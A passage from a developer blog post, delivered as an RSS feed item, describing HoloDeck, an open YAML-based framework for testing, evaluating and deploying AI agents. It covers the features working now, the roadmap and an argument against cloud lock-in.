&lt;li&gt;GenAI attributes: &lt;code&gt;gen_ai.system&lt;/code&gt;, &lt;code&gt;gen_ai.request.model&lt;/code&gt;, &lt;code&gt;gen_ai.usage.*&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Cost tracking&lt;/li&gt;
&lt;li&gt;Works with Jaeger, Prometheus, Datadog, Honeycomb, LangSmith&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;CI/CD&lt;/strong&gt; - Works with GitHub Actions, GitLab CI, Jenkins, whatever you use.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# .github/workflows/deploy-agents.yml
on: [push]
jobs:
  test-agents:
    runs-on: ubuntu-latest
    steps:
      - run: holodeck test agents/
      - run: holodeck deploy agents/ --env production

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  What I'm Going For
&lt;/h2&gt;

&lt;p&gt;I got tired of:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Needing to know 10 different frameworks to do anything&lt;/li&gt;
&lt;li&gt;Writing custom orchestration for every project&lt;/li&gt;
&lt;li&gt;Manual testing and "hope it works" deployments&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;What I wanted:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Accessible&lt;/strong&gt; - YAML-based, code optional&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measurable&lt;/strong&gt; - Evaluation from day one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reliable&lt;/strong&gt; - Systematic testing and versioning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portable&lt;/strong&gt; - Not locked to any cloud&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Current State
&lt;/h2&gt;

&lt;p&gt;HoloDeck is in active development. What's working now:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CLI&lt;/strong&gt; - Commands for init, chat, test, validate, and deploy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Interactive Chat&lt;/strong&gt; - CLI chat with streaming and multimodal support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools&lt;/strong&gt; - Vector store integration, MCP (Model Context Protocol) support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test Cases&lt;/strong&gt; - YAML-based test scenarios, multimodal file support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Evaluations&lt;/strong&gt; - NLP metrics (F1, ROUGE, BLEU, METEOR) and LLM-as-judge scoring&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Configuration Management&lt;/strong&gt; - Environment variable substitution, config merging, validation&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;Actively building:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;API Serving&lt;/strong&gt; - Deploy agents as REST APIs with FastAPI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability&lt;/strong&gt; - OpenTelemetry integration with GenAI semantic conventions&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Down the Road
&lt;/h2&gt;

&lt;p&gt;Eventually:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cloud Deployment&lt;/strong&gt; - Native integration with AWS, GCP, Azure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Agent Orchestration&lt;/strong&gt; - Advanced patterns for agent communication&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost Analytics&lt;/strong&gt; - LLM usage tracking and optimization&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  On Ownership
&lt;/h2&gt;

&lt;p&gt;Here's something that bothers me: we don't outsource our entire software development lifecycle to cloud providers. We choose our own version control, CI/CD, testing frameworks, deployment targets. Why should agents be different?&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Software Development&lt;/th&gt;
&lt;th&gt;Agent Development (today)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Git (self-hosted or any provider)&lt;/td&gt;
&lt;td&gt;Agent definitions (locked to platform)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CI/CD (Jenkins, GitHub Actions, GitLab)&lt;/td&gt;
&lt;td&gt;Testing &amp;amp; validation (vendor-specific)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Testing frameworks (Jest, pytest, JUnit)&lt;/td&gt;
&lt;td&gt;Evaluation (proprietary metrics)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment (your infrastructure)&lt;/td&gt;
&lt;td&gt;Runtime (cloud-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cloud platforms are convenient, but you give up:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Portability&lt;/strong&gt; - Your agent definitions are tied to proprietary formats&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flexibility&lt;/strong&gt; - Limited to their supported models and patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost control&lt;/strong&gt; - Usage-based pricing that scales against you&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data sovereignty&lt;/strong&gt; - Your prompts and responses live on their servers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I wanted something different: portable YAML definitions, any LLM (cloud or local), your own evaluation criteria, deploy anywhere, integrate with existing CI/CD. That's what HoloDeck is trying to be.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;HoloDeck focuses on a few things: config-driven agents, systematic testing, and fitting into your existing workflow. Not trying to be everything to everyone.&lt;/p&gt;

&lt;p&gt;If any of this resonates, check out the &lt;a href="https://docs.useholodeck.ai/" rel="noopener noreferrer"&gt;docs&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Series Recap
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://justinbarias.github.io//blog/holodeck-part1-problem" rel="noopener noreferrer"&gt;Part 1: Why It Feels Broken&lt;/a&gt; - The problem&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;Part 2: What's Out There&lt;/a&gt; - The landscape&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Part 3: How HoloDeck Works&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>cli</category>
    </item>
  </channel>
</rss>
